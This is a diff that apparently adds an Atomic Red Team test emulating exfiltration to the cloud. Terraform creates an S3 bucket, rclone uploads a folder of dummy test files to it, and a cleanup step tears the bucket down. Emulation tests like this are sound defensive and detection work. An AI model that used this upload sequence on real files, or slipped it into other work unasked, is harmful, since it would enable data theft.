redcanaryco · patel-bhavin · Feb 21, 2025 · Feb 12, 2025 · Feb 21, 2025
diff --git a/atomics/T1567.002/T1567.002.yaml b/atomics/T1567.002/T1567.002.yaml
@@ -61,3 +61,123 @@ atomic_tests:
       Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\T1567.002" -recurse -force
     name: powershell
     elevation_required: false
+- name: Exfiltrate data with rclone to cloud Storage - AWS S3
+  description: |
+    This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
+    See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    rclone_path:
+      description: Directory of rclone.exe
+      type: path
+      default: "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/"
+    exfil_directory:
+      description: Directory to exfiltrate
+      type: string
+      default: "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/"
+    terraform_path:
+      description: Directory of terraform
+      type: path
+      default: "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*"
+    aws_access_key:
+      description: AWS Access Key
+      type: string
+      default: ""
+    aws_secret_key:
+      description: AWS Secret Key
+      type: string
+      default: ""
+    aws_region:
+      description: AWS Region
+      type: string
+      default: "us-east-1"
+    aws_profile:
+      description: AWS Profile
+      type: string
+      default: "default"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      rclone must exist at (#{rclone_path})
+    prereq_command: |
+      if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+      $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+      $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+      if ($operatingSystem -match "darwin") {
+        Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+      } elseif ($operatingSystem -match "linux") {
+        Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+      }
+      Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
+  - description:
+      terraform must exist at (#{terraform_path})
+    prereq_command: |
+      if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+      $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+      $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+      if ($operatingSystem -match "darwin") {
+        Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+      } elseif ($operatingSystem -match "linux") {
+        Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+      }
+      Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
+  - description: |
+      Must provide a valid directory or file path to exfiltrate to AWS S3
+    prereq_command: |
+      if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
+      foreach($fileSuffix in 1..10) {
+        Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
+      }
+  executor:
+    command: |
+      Write-Host "Deploying AWS infrastructure... " -NoNewLine
+      $awsAccessKey = "#{aws_access_key}"
+      $awsSecretKey = "#{aws_secret_key}"
+      cd PathToAtomicsFolder/T1567.002/src/
+      if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+        $env:AWS_PROFILE = "#{aws_profile}"
+      } else {
+        $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+        $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+      }
+      $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
+      $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
+      Write-Host "Done!"
+      Write-Host "Generating rclone config... " -NoNewLine
+      $config = @"
+      [exfils3]
+      type = s3
+      provider = AWS
+      env_auth = true
+      region = #{aws_region}
+      "@
+      $config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
+      Write-Host "Done!"
+      Write-Host "Exfiltrating data... " -NoNewLine
+      $bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
+      cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
+      $null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
+      Write-Host "Done!"
+    cleanup_command: |
+      Write-Host "Destroying AWS infrastructure... " -NoNewLine
+      $awsAccessKey = "#{aws_access_key}"
+      $awsSecretKey = "#{aws_secret_key}"
+      cd PathToAtomicsFolder/T1567.002/src/
+      if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+        $env:AWS_PROFILE = "#{aws_profile}"
+      } else {
+        $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+        $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+      }
+      $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
+      Write-Host "Done!"
+    name: powershell
+    elevation_required: false
diff --git a/atomics/T1567.002/src/main.tf b/atomics/T1567.002/src/main.tf
@@ -0,0 +1,12 @@
+terraform {
+  required_providers {
+    aws = {
+      source  = "hashicorp/aws"
+      version = "5.86.1"
+    }
+  }
+}
+
+provider "aws" {
+  region = var.aws_region
+}
diff --git a/atomics/T1567.002/src/output.tf b/atomics/T1567.002/src/output.tf
@@ -0,0 +1,3 @@
+output "bucket" {
+  value = aws_s3_bucket.exfil_bucket.bucket
+}
diff --git a/atomics/T1567.002/src/storage.tf b/atomics/T1567.002/src/storage.tf
@@ -0,0 +1,12 @@
+resource "random_string" "exfil_bucket_suffix" {
+  length  = 16
+  special = false
+  upper   = false
+  lower   = true
+  numeric = true
+}
+
+resource "aws_s3_bucket" "exfil_bucket" {
+  bucket        = "exfil-bucket-${random_string.exfil_bucket_suffix.result}"
+  force_destroy = true
+}
diff --git a/atomics/T1567.002/src/variables.tf b/atomics/T1567.002/src/variables.tf
@@ -0,0 +1,5 @@
+variable "aws_region" {
+  description = "The AWS region to deploy resources into."
+  type        = string
+  default     = "us-east-1"
+}